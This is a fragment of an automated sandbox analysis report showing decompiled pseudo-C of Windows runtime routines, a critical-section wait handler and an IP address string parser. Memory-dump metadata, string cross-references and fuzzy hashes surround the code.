                                                                                                                                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                    							E02073F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                    							_t53 =  *_t85;
                                                                                                                                                    							_t93 = _t92 + 0x20;
                                                                                                                                                    							_t67 = _t67 + 1;
                                                                                                                                                    							__eflags = _t53 - 0xffffffff;
                                                                                                                                                    							if(_t53 != 0xffffffff) {
                                                                                                                                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t67 - 2;
                                                                                                                                                    							if(_t67 > 2) {
                                                                                                                                                    								__eflags = _t85 - 0x21020c0;
                                                                                                                                                    								if(_t85 != 0x21020c0) {
                                                                                                                                                    									_t76 = _a4;
                                                                                                                                                    									__eflags = _a4 - _a8;
                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                    										E020A217A(_t71, __eflags, _t85);
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							_push("RTL: Re-Waiting\n");
                                                                                                                                                    							_push(0);
                                                                                                                                                    							_push(0x65);
                                                                                                                                                    							_a8 = _a4;
                                                                                                                                                    							E02073F92();
                                                                                                                                                    							_t91 = _t93 + 0xc;
                                                                                                                                                    							__eflags =  *0x7ffe0382;
                                                                                                                                                    							if( *0x7ffe0382 != 0) {
                                                                                                                                                    								goto L21;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L36;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					return _t40;
                                                                                                                                                    				}
                                                                                                                                                    				L36:
                                                                                                                                                    			}

































                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020824BD
                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0208248D
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 020824FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                    • Opcode ID: 974c8647554538332bc3f90034eac2b4a144d1a5fe04ba9584f28c57a7e0d2fe
                                                                                                                                                    • Instruction ID: acca8b2cf2e9c23a89d4226f0406b3bbecb87abf975a5971adce43fa11b94ed7
                                                                                                                                                    • Opcode Fuzzy Hash: 974c8647554538332bc3f90034eac2b4a144d1a5fe04ba9584f28c57a7e0d2fe
                                                                                                                                                    • Instruction Fuzzy Hash: C641C4B0A00304AFD720EB68CD88FAB77F9AF44720F208655F9559B2C0D770E941EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0205FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _t105;
                                                                                                                                                    				void* _t110;
                                                                                                                                                    				char _t114;
                                                                                                                                                    				short _t115;
                                                                                                                                                    				void* _t118;
                                                                                                                                                    				signed short* _t119;
                                                                                                                                                    				short _t120;
                                                                                                                                                    				char _t122;
                                                                                                                                                    				void* _t127;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    				signed int _t136;
                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                    				signed int _t158;
                                                                                                                                                    				signed short* _t164;
                                                                                                                                                    				signed int _t167;
                                                                                                                                                    				void* _t170;
                                                                                                                                                    
                                                                                                                                                    				_t158 = 0;
                                                                                                                                                    				_t164 = _a4;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v24 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v16 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_t136 = 0;
                                                                                                                                                    				while(1) {
                                                                                                                                                    					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                    					if(_t167 == _t158) {
                                                                                                                                                    						break;
                                                                                                                                                    					}
                                                                                                                                                    					_t118 = _v20 - _t158;
                                                                                                                                                    					if(_t118 == 0) {
                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                    							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                    								break;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_t143 = 2;
                                                                                                                                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                    								_v28 = 1;
                                                                                                                                                    								_v8 = _t143;
                                                                                                                                                    								_t136 = _t136 + 1;
                                                                                                                                                    								L47:
                                                                                                                                                    								_t164 = _t119;
                                                                                                                                                    								_v20 = _t143;
                                                                                                                                                    								L14:
                                                                                                                                                    								if(_v24 == _t158) {
                                                                                                                                                    									L19:
                                                                                                                                                    									_t164 =  &(_t164[1]);
                                                                                                                                                    									_t158 = 0;
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v12 == _t158) {
                                                                                                                                                    									if(_v16 > 4) {
                                                                                                                                                    										L29:
                                                                                                                                                    										return 0xc000000d;
                                                                                                                                                    									}
                                                                                                                                                    									_t120 = E0205EE02(_v24, _t158, 0x10);
                                                                                                                                                    									_t170 = _t170 + 0xc;
                                                                                                                                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                    									_t136 = _t136 + 1;
                                                                                                                                                    									goto L19;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v16 > 3) {
                                                                                                                                                    									goto L29;
                                                                                                                                                    								}
                                                                                                                                                    								_t122 = E0205EE02(_v24, _t158, 0xa);
                                                                                                                                                    								_t170 = _t170 + 0xc;
                                                                                                                                                    								if(_t122 > 0xff) {
                                                                                                                                                    									goto L29;
                                                                                                                                                    								}
                                                                                                                                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                    								goto L19;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L21:
                                                                                                                                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                    							break;
                                                                                                                                                    						} else {
                                                                                                                                                    							if(E0205685D(_t167, 4) == 0) {
                                                                                                                                                    								if(E0205685D(_t167, 0x80) != 0) {
                                                                                                                                                    									if(_v12 > 0) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t127 = 1;
                                                                                                                                                    									_a7 = 1;
                                                                                                                                                    									_v24 = _t164;
                                                                                                                                                    									_v20 = 1;
                                                                                                                                                    									_v16 = 1;
                                                                                                                                                    									L36:
                                                                                                                                                    									if(_v20 == _t127) {
                                                                                                                                                    										goto L19;
                                                                                                                                                    									}
                                                                                                                                                    									_t158 = 0;
                                                                                                                                                    									goto L14;
                                                                                                                                                    								}
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_a7 = 0;
                                                                                                                                                    							_v24 = _t164;
                                                                                                                                                    							_v20 = 1;
                                                                                                                                                    							_v16 = 1;
                                                                                                                                                    							goto L19;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t130 = _t118 - 1;
                                                                                                                                                    					if(_t130 != 0) {
                                                                                                                                                    						if(_t130 == 1) {
                                                                                                                                                    							goto L21;
                                                                                                                                                    						}
                                                                                                                                                    						_t127 = 1;
                                                                                                                                                    						goto L36;
                                                                                                                                                    					}
                                                                                                                                                    					if(_t167 >= 0x80) {
                                                                                                                                                    						L7:
                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                    							_t158 = 0;
                                                                                                                                                    							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                    								break;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                    									L13:
                                                                                                                                                    									_v20 = _t158;
                                                                                                                                                    									goto L14;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v28 != 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_v28 = _v8 + 1;
                                                                                                                                                    								_t143 = 2;
                                                                                                                                                    								_v8 = _v8 + _t143;
                                                                                                                                                    								goto L47;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                    							break;
                                                                                                                                                    						} else {
                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                    							_t158 = 0;
                                                                                                                                                    							goto L13;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					if(E0205685D(_t167, 4) != 0) {
                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                    						goto L19;
                                                                                                                                                    					}
                                                                                                                                                    					if(E0205685D(_t167, 0x80) != 0) {
                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                    						if(_v12 > 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_a7 = 1;
                                                                                                                                                    						goto L19;
                                                                                                                                                    					}
                                                                                                                                                    					goto L7;
                                                                                                                                                    				}
                                                                                                                                                    				 *_a8 = _t164;
                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                    					if(_v12 != 3) {
                                                                                                                                                    						goto L29;
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                    					if(_v20 != 1) {
                                                                                                                                                    						if(_v20 != 2) {
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                    						L65:
                                                                                                                                                    						_t105 = _v28;
                                                                                                                                                    						if(_t105 != 0) {
                                                                                                                                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                    							E02038980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                    							_t110 = 8;
                                                                                                                                                    							E0202DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                    						}
                                                                                                                                                    						return 0;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                    						if(_v16 > 3) {
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    						_t114 = E0205EE02(_v24, 0, 0xa);
                                                                                                                                                    						_t170 = _t170 + 0xc;
                                                                                                                                                    						if(_t114 > 0xff) {
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                    						goto L65;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v16 > 4) {
                                                                                                                                                    						goto L29;
                                                                                                                                                    					}
                                                                                                                                                    					_t115 = E0205EE02(_v24, 0, 0x10);
                                                                                                                                                    					_t170 = _t170 + 0xc;
                                                                                                                                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                    					goto L65;
                                                                                                                                                    				} else {
                                                                                                                                                    					goto L29;
                                                                                                                                                    				}
                                                                                                                                                    			}

























                                                                                                                                                    0x0205fe1f
                                                                                                                                                    0x0208ed25
                                                                                                                                                    0x0208ed86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed91
                                                                                                                                                    0x0208ed95
                                                                                                                                                    0x0208ed95
                                                                                                                                                    0x0208ed9a
                                                                                                                                                    0x0208edad
                                                                                                                                                    0x0208edb3
                                                                                                                                                    0x0208edba
                                                                                                                                                    0x0208edc4
                                                                                                                                                    0x0208edc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208edcc
                                                                                                                                                    0x0208ed2a
                                                                                                                                                    0x0208ed55
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed61
                                                                                                                                                    0x0208ed66
                                                                                                                                                    0x0208ed6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed7d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed7d
                                                                                                                                                    0x0208ed30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed3c
                                                                                                                                                    0x0208ed43
                                                                                                                                                    0x0208ed4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction ID: 5334a878e43e28f97e471720447d44306f9bc2d42f7eded202afcfa61efacc05
                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction Fuzzy Hash: 0D91BF31D0032AEADF25EF58C8487EFBBF9EF42308F20806AD845A6551E7745A45EB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%